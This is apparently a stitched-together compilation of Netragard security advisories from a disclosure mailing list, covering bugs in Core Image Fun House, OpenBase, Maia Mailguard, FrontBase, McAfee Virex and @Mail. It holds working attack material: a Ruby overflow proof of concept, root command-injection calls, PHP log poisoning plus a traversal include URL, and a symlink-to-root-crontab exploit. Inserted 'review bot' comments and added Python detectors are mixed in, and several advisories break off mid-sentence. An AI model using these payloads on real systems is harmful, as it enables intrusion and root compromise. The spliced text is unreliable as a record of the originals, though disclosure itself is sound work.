[Full-disclosure] [NETRAGARD SECURITY ADVISORY][Apple Core Image Fun House <= 2.0 OS X -- Arbitrary Code Execution][NETRAGARD-20080711]

2008-07-11 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** NETRAGARD ADVISORY ***
 http://www.netragard.com
   We make IT Safe


[Advisory Summary]
- --
Advisory Author : Adriel T. Desautels
Researcher  : Kevin Finisterre
Advisory ID : NETRAGARD-20080711
Product Name: Core Image Fun House
Product Version : <= 2.0 OS X
Vendor Name : http://www.apple.com
Type of Vulnerability   : Buffer Overflow
Effort (1-10 where 1 == easy)   : 5
Impact  : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released  : N/A
Discovery Date  : 07/10/2007




[POSTING NOTICE]
- --
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.





[Product Description]
- --
From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications.

- -- http://developer.apple.com/macosx/coreimage.html  --





[Technical Summary]
- --
It is possible to trigger an exploitable buffer overflow condition
by creating a specially crafted .funhouse file.





[Technical Details]
- --
The Fun House application does not bound the length of strings it takes
from the XML plist inside a .funhouse bundle. Specifically, the file name
of an image layer is turned into a label and copied into a fixed 256-byte
stack buffer with an unbounded getCString: call, so a specially crafted
.funhouse file triggers an exploitable buffer overflow. The code
responsible for the condition is as follows:

// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
    ...
    NSString *str, *str2, *localizedParameter;
    ...

    else if ([type isEqualToString:@"image"])
    {
        // image effect stack element
        // show an image origin (in its center)
        CGRect r = [[es imageAtIndex:i] extent];
        NSPoint offset = [es offsetAtIndex:i];
        pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
        pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
        str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
        [self drawPoint:pt label:str intoContext:cg];
    }
    ...
}

The following method is called by the code referenced above:

/*
    Drawing
*/

// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a center symbol - a circle with crosshairs through it.
// the handle is labelled with the string str.
// all items are shadowed
- (void)drawPoint:(NSPoint)pt label:(NSString *)str
        intoContext:(CGContextRef)cg
{
    ...
    char cstr[256];
    ...
    if (!movingNow)
    {
        [str getCString:cstr];  // <-- Vulnerability exists here: no length bound


[Fix]
- --
To fix the issue, the [str getCString:cstr]; call needs to be replaced
with a bounded copy such as [str getCString:cstr maxLength:254]; so that
a label longer than the 256-byte cstr buffer is truncated instead of
overflowing it.


- -   [str getCString:cstr];
+   [str getCString:cstr maxLength:254];
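Review bot: the bound is hard-coded while the buffer it protects is declared as char cstr[256] further up; derive it from the buffer (maxLength:sizeof(cstr) - 2, which matches the 254 here and leaves room for the terminating NUL) so the two cannot drift apart. getCString:maxLength: is also deprecated in favour of getCString:maxLength:encoding:, which returns NO when the string does not fit; checking that return and rejecting over-long labels is preferable to silent truncation, and it makes the encoding explicit instead of relying on the default C-string encoding.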


[Proof Of Concept]
- --
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. [EMAIL PROTECTED]
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:  'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is not proper UTF-8. The file name for this data
# could be:
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# Bytes in the \x80-\xFF range that do not form proper UTF-8
# produce the warning above, so the return address must avoid them.

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
  File.unlink(fname + ".funhouse/file.xml")
  Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
  "<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" " +
  "\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
  "<plist version=\"1.0\">" +
  "<dict>" +
  "<key>layers</key>" +
  "<array>" +
  "<dict>" +
  "<key>file</key>" +
  "<string>" +
  "Z" * len + [retaddr].pack("V") +
  "</string>" +
  "<key>offsetX</key>" +
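Building on the sizes in the advisory (char cstr[256] and the " center" suffix), the Python below is an added example, not Netragard's PoC or Apple's code: it computes the file-name length at which getCString: overruns cstr and scans a .funhouse/file.xml for such a layer. The plist structure is taken from the PoC above (only the layers/file keys are relied on); the offsetX value and the UTF-8 byte-count assumption are constructed.

```python
import plistlib

# Sizes taken from the advisory: drawPoint: copies the label into
# `char cstr[256]` and the label is the layer's file name + " center".
CSTR_SIZE = 256
LABEL_SUFFIX = " center"


def label_for_file(filename):
    """Label drawPoints: builds for an image layer."""
    return filename + LABEL_SUFFIX


def label_bytes(filename):
    # Assumption: the label is counted as UTF-8 bytes; getCString: really
    # uses the default C-string encoding, so multi-byte names may differ.
    return len(label_for_file(filename).encode("utf-8"))


def overflows_cstr(filename):
    """True when the unbounded getCString: would write past cstr.
    The copy writes the label plus a NUL, so 255 label bytes is the most
    that fits; with the 7-byte suffix that is a 248-byte file name."""
    return label_bytes(filename) + 1 > CSTR_SIZE


def max_safe_filename_bytes():
    return CSTR_SIZE - 1 - len(LABEL_SUFFIX)   # 248


def scan_funhouse_xml(xml_bytes):
    """Parse a .funhouse/file.xml plist and return the `file` names of any
    layers whose label would overflow cstr. Only the layers -> file keys the
    advisory's PoC shows are relied on; other keys are ignored."""
    doc = plistlib.loads(xml_bytes)       # raises on malformed XML/plist
    bad = []
    for layer in doc.get("layers", []):
        name = layer.get("file") if isinstance(layer, dict) else None
        if isinstance(name, str) and overflows_cstr(name):
            bad.append(name)
    return bad


# Constructed sample in the layout the advisory's Ruby PoC writes; the
# offsetX value is a placeholder since the page does not show one.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>layers</key>
  <array>
    <dict>
      <key>file</key>
      <string>%s</string>
      <key>offsetX</key>
      <real>0</real>
    </dict>
  </array>
</dict>
</plist>
"""


def build_sample(filename):
    """Constructed .funhouse/file.xml with a single image layer."""
    return (SAMPLE_XML % filename).encode("utf-8")


if __name__ == "__main__":
    for name in ("photo.jpg", "Z" * 300):
        print(len(name), "byte file name ->", scan_funhouse_xml(build_sample(name)))
```

The 248-byte threshold is the practical number for triage: any layer whose file name is longer than that reaches the unbounded copy with more bytes than cstr can hold, regardless of what follows in the plist.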

[Full-disclosure] [NETRAGARD-20070313 SECURITY ADVISORY] [OpenBase SQL Relational Database 10.0.5 - SYSTEM/root compromise]

2007-11-05 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

** Netragard,  L.L.C  Advisory**
Penetration Testing, Vulnerability Assessments, Web Application Security


Strategic Reconnaissance Team
  
  http://www.netragard.com -- We make I.T. Safe.

[POSTING NOTICE]
- --
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com


[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher  : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name: OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability   : Remote Buffer Overflow, Command injection
Effort  : Easy

[Product Description]
- --
For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include ATT, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide.

- -- http://openbase.com/home-Aboutus.html  --

[Technical Summary]
- --
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered is a buffer overflow that causes heap
corruption. It too has the potential to lead to the execution of
arbitrary code, or to a denial of service condition.


[Technical Details]
- --
1. call AsciiBackup('`id`')
   results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog('../../../path/to/file', '\n user input goes here \n')
   results in root-owned files being created. Combine with the above for
   an easy backdoor.

openbase 1> call GlobalLog('../../../../../../etc/periodic/daily/600', '\n/usr/bin/id > /tmp/file\n')
openbase 2> go
Data returned... calculating column widths

return_0
--
Success
--
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg; /usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
--
Failure
--
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select ... from aaa...
   results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall(`/usr/bin/id > /tmp/aaax`, `/usr/bin/id > /tmp/bbbx`, `/usr/bin/id > /tmp/x`, `/usr/bin/id > /tmp/cdfx`)
   results in commands being run as root

A second exploitable vulnerability exists in the creation of stored
procedures and can be used to gain NT AUTHORITY\SYSTEM or root level
privileges. Specifically, a user can create a stored procedure with an
unusually long name, which triggers a buffer overflow and corrupts the
heap. If done properly, an attacker may be able to execute arbitrary
commands on the affected system.
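The findings above (shell metacharacters reaching a root shell through AsciiBackup and OEMLicenseInstall, a traversal path passed to GlobalLog, and an over-long procedure name) can be checked for in a SQL statement log. The Python below is an added example written for this page, not OpenBase code or Netragard's PoC: the procedure names come from the advisory, while the statement grammar, the 256-byte name threshold and the sample statements are constructed assumptions.

```python
import re

# Procedures the advisory shows handing their arguments to a root shell, and
# the one that writes to a caller-chosen path as root (index of that argument).
SHELL_PROCS = {"asciibackup", "oemlicenseinstall"}
PATH_PROCS = {"globallog": 0}
SHELL_META = re.compile(r"[`$;|&<>\n]")
# Assumed threshold: the advisory only says an "unusually long" name corrupts
# the heap, so 256 is a constructed audit limit, not a figure from the page.
NAME_LIMIT = 256

CALL_RE = re.compile(r"^\s*call\s+(\w+)\s*\((.*)\)\s*;?\s*$", re.I | re.S)
CREATE_RE = re.compile(r"^\s*create\s+procedure\s+(\S+?)\s*\(", re.I | re.S)


def split_args(argstr):
    """Split an argument list on top-level commas. Single/double quotes group
    text; a backslash escapes the next character. Backticks are deliberately
    not treated as quotes, so they stay visible to the metacharacter check."""
    args, cur, quote, i = [], [], None, 0
    while i < len(argstr):
        c = argstr[i]
        if c == "\\" and i + 1 < len(argstr):
            cur.append(argstr[i:i + 2])
            i += 2
            continue
        if quote:
            cur.append(c)
            if c == quote:
                quote = None
        elif c in "'\"":
            quote = c
            cur.append(c)
        elif c == ",":
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    if cur or args:
        args.append("".join(cur).strip())
    return args


def unquote(arg):
    """Drop one layer of matching single or double quotes."""
    if len(arg) >= 2 and arg[0] == arg[-1] and arg[0] in "'\"":
        return arg[1:-1]
    return arg


def audit_statement(stmt):
    """Return a list of findings for one statement; empty means nothing seen."""
    findings = []
    m = CALL_RE.match(stmt)
    if m:
        proc = m.group(1).lower()
        args = [unquote(a) for a in split_args(m.group(2))]
        if proc in SHELL_PROCS:
            for n, a in enumerate(args):
                if SHELL_META.search(a):
                    findings.append("%s: shell metacharacter in argument %d: %r" % (proc, n, a))
        if proc in PATH_PROCS and PATH_PROCS[proc] < len(args):
            path = args[PATH_PROCS[proc]]
            if ".." in path.split("/") or path.startswith("/"):
                findings.append("%s: path escapes the log directory: %r" % (proc, path))
        return findings
    m = CREATE_RE.match(stmt)
    if m and len(m.group(1)) > NAME_LIMIT:
        findings.append("create procedure: %d-byte name exceeds %d" % (len(m.group(1)), NAME_LIMIT))
    return findings


# Constructed statements modelled on the advisory's examples plus two benign ones.
SAMPLE_STATEMENTS = [
    "call AsciiBackup('`id`')",
    "call GlobalLog('../../../../../../etc/periodic/daily/600', '\n/usr/bin/id > /tmp/file\n')",
    "call OEMLicenseInstall(`/usr/bin/id > /tmp/aaax`, `/usr/bin/id > /tmp/bbbx`, "
    "`/usr/bin/id > /tmp/x`, `/usr/bin/id > /tmp/cdfx`)",
    "create procedure " + "a" * 300 + "() begin end;",
    "call AsciiBackup('nightly')",
    "create procedure nightly_report() begin end;",
]

if __name__ == "__main__":
    for s in SAMPLE_STATEMENTS:
        print(repr(s[:60]), "->", audit_statement(s) or "clean")
```

The vendor's fix (running the server as an unprivileged openbase user) limits the damage but does not remove the injection; statements like these are still worth alerting on in the ISQL or query log.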


[Proof Of Concept]
- --
See Above

[Vendor Status]
- --
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

OpenBase now runs as the 'openbase' user for security reasons.  I would
like to publically thank Kevin Finisterre for his input.

[Disclaimer]
- http://www.netragard.com--
Netragard, L.L.C. 

[Full-disclosure] [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]

2007-07-05 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** NETRAGARD ADVISORY ***
 http://www.netragard.com
   We make IT Safe
[Advisory Summary]
- ---
Advisory Author : Adriel T. Desautels
Advisory ID : NETRAGARD-20070628
Product Name: Maia Mailguard
Product Version : <= 1.0.2 FreeBSD and Possibly More
Vendor Name : http://www.miamailguard.com
Type of Vulnerability   : Directory Traversal / File Read
Effort (1-10 where 1 == easy)   : 2
Impact  : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released  : N/A
Discovery Date  : 06/10/2007








[Product Description]
- ---
Maia Mailguard is a web-based interface and management system based on
the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl
and PHP, Maia Mailguard gives end-users control over how their mail is
processed by virus scanners and spam filters, while giving mail
administrators the power to configure site-wide defaults and limits.

- -- http://www.miamailguard.com  --




[Technical Summary]
- ---
A Directory Traversal vulnerability exists in the Maia Mailguard Web
Application that enables an attacker to execute arbitrary commands on
the affected system.




[Technical Details]
- ---
Improper input validation of the lang parameter in the Maia Mailguard web
application results in a directory traversal vulnerability that can be
used to read arbitrary files on the affected system or, combined with log
poisoning, to execute arbitrary commands on the affected system.




[Proof Of Concept]
- ---
1-) An attacker can inject code into the httpd-error.log file by
connecting to port 80 on the affected system and issuing a malformed
request line that carries the PHP code; Apache writes the rejected
request line, code included, to its error log. See the example below:

the-wretched:~ simon$ telnet maiatest.snosoft.com 80
Trying 10.0.0.128...
Connected to maiatest.snosoft.com.
Escape character is '^]'.

get <pre><?php system('ls -laf /var/log');?>

HTTP/1.1 400 Bad Request
Date: Wed, 20 Jun 2007 21:31:58 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28
OpenSSL/0.9.7e-p1
Connection: close
Content-Type: text/html; charset=iso-8859-1

2-) Once the attacker has injected his code into the log file, the code
can be executed by forcing the web application to include the log file
through the lang parameter. The %00 byte terminates the file name so
that whatever the application appends after the parameter is ignored.
Below is an example of code execution:

the-wretched:~ simon$ wget 'http://maiatest.snosoft.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt'
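As an added example (not part of the advisory or of Maia Mailguard's code), the Python below models the flawed lookup and its fix: the LANG_DIR path, the .txt suffix assumed to be appended by the application, the NUL-truncation behaviour of the PHP file functions of that era and the access-log lines are constructed assumptions; the attack URL is the one from the wget command above.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs

# Assumed deployment layout and suffix; the advisory does not show the PHP
# line, only that `lang` is used unvalidated to open a file.
LANG_DIR = "/usr/local/www/maia/lang"
APP_SUFFIX = ".txt"
LANG_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")   # en, en_US, pt_BR ...


def c_string(s):
    """The NUL truncation PHP's C-level file functions applied at the time:
    everything after the first NUL byte is ignored."""
    return s.split("\x00", 1)[0]


def lang_from_url(url):
    """Decode the lang parameter as the web server would (%00 -> NUL byte)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("lang", [""])[0]


def vulnerable_path(lang):
    """Model of the flawed include: concatenate, NUL-truncate, then let the
    kernel walk the '..' components (normpath stands in for that walk)."""
    return os.path.normpath(c_string(os.path.join(LANG_DIR, lang + APP_SUFFIX)))


def safe_lang_path(lang):
    """Allowlist the value, then confirm the resolved path stays under
    LANG_DIR. Returns None when the request must be rejected."""
    if not LANG_RE.match(lang):
        return None
    path = os.path.realpath(os.path.join(LANG_DIR, lang + APP_SUFFIX))
    if not path.startswith(os.path.realpath(LANG_DIR) + os.sep):
        return None
    return path


REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_lang_requests(access_log_lines):
    """Flag access-log entries whose lang value carries traversal, an
    absolute path or a NUL byte."""
    hits = []
    for line in access_log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        lang = lang_from_url(m.group(1))
        if "\x00" in lang or ".." in lang.split("/") or lang.startswith("/"):
            hits.append(line)
    return hits


# Constructed inputs: the wget URL from the advisory and two access-log
# lines in common log format.
ATTACK_URL = ("http://maiatest.snosoft.com/maia/login.php?lang="
              + "../" * 13 + "var/log/httpd-error.log%00.txt")
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jun/2007:21:32:10 +0000] "GET /maia/login.php?lang=en HTTP/1.1" 200 5120',
    '10.0.0.5 - - [20/Jun/2007:21:32:41 +0000] "GET /maia/login.php?lang='
    + "../" * 13 + 'var/log/httpd-error.log%00.txt HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    lang = lang_from_url(ATTACK_URL)
    print("vulnerable include opens:", vulnerable_path(lang))
    print("hardened lookup returns:", safe_lang_path(lang))
    print("flagged log lines:", len(suspicious_lang_requests(SAMPLE_LOG)))
```

The allowlist is the real fix; the realpath containment check is defence in depth and would not help on its own against the NUL byte, because the truncation happens inside the file API after any string-level check.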




[Vendor Status]
- ---
Vendor has been notified and was quick to resolve the issue.




[Vendor Comments]
- ---
The only addition that I had was that it seems to only affect systems
like freebsd...  It would be nice to nail that down.   I suspect the
root security issue is really with the php and file-system
interaction... my patch just simply works around and blocks the root
problem.   From my developer point of view, I'm asking for one file
and the file-system is giving us something else.  That's a serious
risk. If we could at least express that concern, I think that would
be prudent.

Chicken and egg problem, I was kinda waiting on you to post our own
ticket, but I can add a comment afterwards. OK.
Here's our ticket which also references the changeset:

http://www.maiamailguard.org/maia/ticket/479

A unified patch may be retrieved from:
http://www.maiamailguard.org/maia/changeset/1184?format=diff&new=1184

David Morton




[Disclaimer]
- --http://www.netragard.com-
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

http://www.netragard.com







-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm
4LRwop09S8YjiKDwTSpvgXY=
=TeIH
-END PGP 

[Full-disclosure] [NETRAGARD-20070316 SECURITY ADVISORY][FrontBase Database <= 4.2.7 ALL PLATFORMS][REMOTE BUFFER OVERFLOW CONDITION][LEVEL: EASY][RISK:MEDIUM]

2007-03-16 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** Netragard, L.L.C. Advisory ***

 Strategic Reconnaissance Team


  
  http://www.netragard.com -- We make I.T. Safe.




[Advisory Information]
- ---
Contact : Adriel T. Desautels
Researcher  : Kevin Finisterre
Advisory ID : NETRAGARD-20070316
Product Name: FrontBase Relational Database Server
Product Version : <= FrontBase 4.2.7 (All Platforms)
Vendor Name : FrontBase, Inc.
Type of Vulnerability   : Remote Buffer Overflow
Effort  : Easy





[POSTING NOTICE]
- ---
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

Netragard Research: http://www.netragard.com/html/recent_research.html





[About Netragard]
- ---
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products,
Security Appliances, Network Appliances, and Web Applications commonly
found in businesses internationally. We apply the knowledge gained by
performing this research to our professional security services. This
in turn enables us to produce high quality deliverables that are the
product of talented security professionals and not those of automated
scanners and tools.  This advisory is the product of research done by
the Strategic Reconnaissance Team.






[Product Description]
- ---
FrontBase is the only enterprise level relational database server that
was created in the Internet age, by Internet professionals specifically
to meet and exceed the demands of today's new economy.

- -- http://www.frontbase.com/  --





[Technical Summary]
- ---

Any user with access to the FrontBase SQL command prompt and sufficient
privileges to create a stored procedure may be able to exploit a buffer
overflow condition in the parsing of 'CREATE PROCEDURE' SQL requests.
Successful exploitation may result in arbitrary code execution or a
denial of service condition.





[Technical Details]
- ---
An exploitable vulnerability exists in FrontBase that can be used to
gain NT AUTHORITY\SYSTEM or root privileges on an affected system. The
vulnerability lies in the creation of stored procedures: if a user
creates a procedure with a very long name, FrontBase crashes due to
memory corruption, and memory can be corrupted in such a way that an
attacker can run arbitrary code.

The following example buffer can be used to trigger the vulnerability:

create procedure
aaa







aaa()
begin
end;

Upon parsing the final ';' in the statement the database will trigger an
exception and crash.

FrontBase runs on the following platforms, all of which this advisory
covers:

Mac OS X Server 10.x
Mac OS X Server 1.2
RedHat
SuSE
YellowDog Linux
Debian Linux
Mandrake Linux
FreeBSD
Solaris
HP-UX
Windows & Windows NT
Windows 2000

Below are a few examples of debugger output which highlight the bug.

On the Windows platform one of two things is possible. First, we can
overwrite the SEH handler with an address of our choosing. Because we
also overwrite EDI when we smash the SEH record, an exception is
triggered, which hands control to the injected exception handler.

EAX
ECX
EDX 01863214
EBX 01863484
ESP 0196F344
EBP 018666D8
ESI 01863E0C
EDI 41414141
EIP 0043BE6D FrontBas.0043BE6D

SEH chain of thread 0D3C
Address    SE handler
0196FFA4   04030201

The other option on Windows is simply to overwrite EIP. This method may
not be as straightforward due to limited register control. It may be
possible to jump into ESP and

[Full-disclosure] [NETRAGARD-20070220 SECURITY ADVISORY] [McAfee VirusScan for Mac (Virex) Local root exploit and Scan Bypass]

2007-02-27 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** Netragard, L.L.C. Advisory ***


 Strategic Reconnaissance Team

  
  http://www.netragard.com -- We make I.T. Safe.















[Advisory Information]
- ---
Contact : Adriel T. Desautels
Researcher  : Kevin Finisterre
Advisory ID : NETRAGARD-20070220
Product Name: McAfee VirusScan for Mac (Virex)
Product Version : <= Virex 7.7
Vendor Name : McAfee
Type of Vulnerability   : Local root exploit and Scan Bypass
Effort  : Easy



[Product Description]
- ---
Guard your Macintosh systems and users against all types of viruses and
malicious code, even new unknown threats with McAfee VirusScan for Mac.

- -- http://www.mcafee.com  --





[Technical Summary]
- ---
McAfee Virex contains an exploitable feature that lets users define
which files are excluded from scanning. This feature relies on a
configuration file with insecure permissions located under
/Library/Application Support. Any user on the system can modify or
delete the configuration file and thereby change what Virex scans.

A simple example of such a modification is to echo an entry into the
file that causes Virex to ignore every file on the system.


[Technical Details]
- ---
An exploitable vulnerability exists in McAfee Virex that can be used to
gain root privileges on an affected system. This vulnerability exists
within the feature that enables users to define files for scan exclusion.
The configuration file used to store the exclusion list has insecure
permissions of rw-rw-rw and as such can be modified or removed by any
user.

Upon system boot the VShieldCheck process, which runs with root
privileges, verifies the existence of the VShieldExclude.txt file
located at:

/Library/Application Support/Virex/VShieldExclude.txt

If VShieldCheck does not find the file at boot it recreates it with
rw-rw-rw permissions. The exact command it uses to set those permissions
is shown below:

SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod
/bin/chmod a+rw '%s' > /dev/null 2>&1

The VShieldCheck process does not check for symlinks before creating the
VShieldExclude.txt file. If an attacker creates a symlink from

/Library/Application Support/Virex/VShieldExclude.txt

to

/var/cron/tabs/root

then at the next system boot VShieldCheck creates /var/cron/tabs/root
through the link and makes it world-writable. The attacker can then
write arbitrary commands into the newly created crontab, which cron
executes with root privileges.

Example:

SNOsoft-virexuser$ crontab -l
crontab: no crontab for virexuser
SNOsoft-virexuser$ Desktop/pwn_virex.pl

Usage: Desktop/pwn_virex.pl <target>

Targets:

0 . Virex 7.7.dmg

SNOsoft-virexuser$ Desktop/pwn_virex.pl 0
*** Target: Virex 7.7.dmg /Library/Application Support/Virex/VShieldExclude.txt
wait for a reboot and a cron run...
SNOsoft-virexuser$ crontab -l
* * * * * /usr/bin/perl /Users/Shared/droptab.pl
SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/
total 88
drwxrwxr-x    5 root      admin   170 Oct 15 22:08 .
drwxrwxr-x   10 root      admin   340 Nov  3 11:11 ..
lrwxr-xr-x    1 virusbar  admin    19 Oct 15 22:08 VShieldExclude.txt -> /var/cron/tabs/root
-rwxr-xr-x    1 root      wheel
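The symlink attack above, as an added example that is not Netragard's pwn_virex.pl or any Virex code: the paths are stand-ins inside a scratch directory, the naive routine models what the advisory says VShieldCheck does as root (create the file by name, then chmod a+rw), and the hardened routine shows the O_NOFOLLOW|O_EXCL pattern a root daemon should use instead.

```python
import os
import stat
import tempfile


def naive_create(path):
    """What the advisory describes VShieldCheck doing as root when the
    exclusion file is missing: create it by name (open(2) follows symlinks)
    and then run the equivalent of "/bin/chmod a+rw '%s'" on that name."""
    with open(path, "a"):
        pass
    os.chmod(path, 0o666)       # chmod(2) also follows the symlink
    return os.path.realpath(path)


def safe_ensure(path, mode=0o644):
    """Hardened replacement: never create or chmod through a link.
    O_NOFOLLOW|O_EXCL makes the kernel refuse if a symlink is (or appears)
    at the name, closing the window between the lstat and the open."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, mode)
        os.close(fd)
        return "created"
    if not stat.S_ISREG(st.st_mode):
        raise OSError("refusing %s: not a regular file (symlink or special)" % path)
    return "exists"


def excl_open_through_symlink(path):
    """Show that O_CREAT|O_EXCL alone already refuses a symlink at `path`."""
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    except FileExistsError:
        return "EEXIST"
    os.close(fd)
    return "created"


def demo(workdir):
    """Constructed stand-ins: `conf` plays VShieldExclude.txt and `target`
    plays /var/cron/tabs/root, both inside a scratch directory."""
    conf = os.path.join(workdir, "VShieldExclude.txt")
    target = os.path.join(workdir, "root_crontab")
    os.symlink(target, conf)                     # attacker's pre-reboot step

    naive_create(conf)                           # root "recreates" the config
    naive = (os.path.exists(target), stat.S_IMODE(os.stat(target).st_mode))
    os.unlink(target)                            # reset for the hardened run

    try:
        safe = safe_ensure(conf)
    except OSError:
        safe = "refused"
    excl = excl_open_through_symlink(conf)
    return naive, safe, excl, os.path.exists(target)


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return demo(d)


if __name__ == "__main__":
    print(run_demo())
```

The naive path ends with the target existing and mode 0666, which is exactly the world-writable root crontab the advisory describes; both hardened variants leave the target untouched. Setting the mode at open time also removes the separate chmod step that the original shelled out for.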

[Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [@Mail WebMail Cross Site Scripting Vulnerability]

2006-12-21 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** Netragard, L.L.C. Advisory ***


 Strategic Reconnaissance Team

  
  http://www.netragard.com -- We make I.T. Safe.















[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher  : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name: @ Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability   : XSS with filter evasion technique.
Effort  : Easy

- --
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
- --
@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device.


- --http://www.atmail.com--





[Technical Summary]
- --
@Mail does not properly sanitize HTML email. While @Mail does prepend a
DEFANGED_ tag to the HTML tags it detects, its detection of SCRIPT tags
can be evaded (for example with <SCRIPT/XSS>). This failure makes @Mail
vulnerable to Cross-site Scripting (XSS) via filter evasion.





[Technical Details]
- --
@Mail renders HTML emails by default (we did not find a way to disable
this feature). Received emails are passed through the following code in
Global.pm, which disarms basic XSS attacks.





- ---8<--- SNIP Global.pm line 626 - 635 SNIP ---8<---
my ( $I1I11I11I11I, $I1I111III1II );
$_ = $III1II1II1II->II1II1I11111($I1I1II1II1I11II1);
if (/</) {
    s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi;
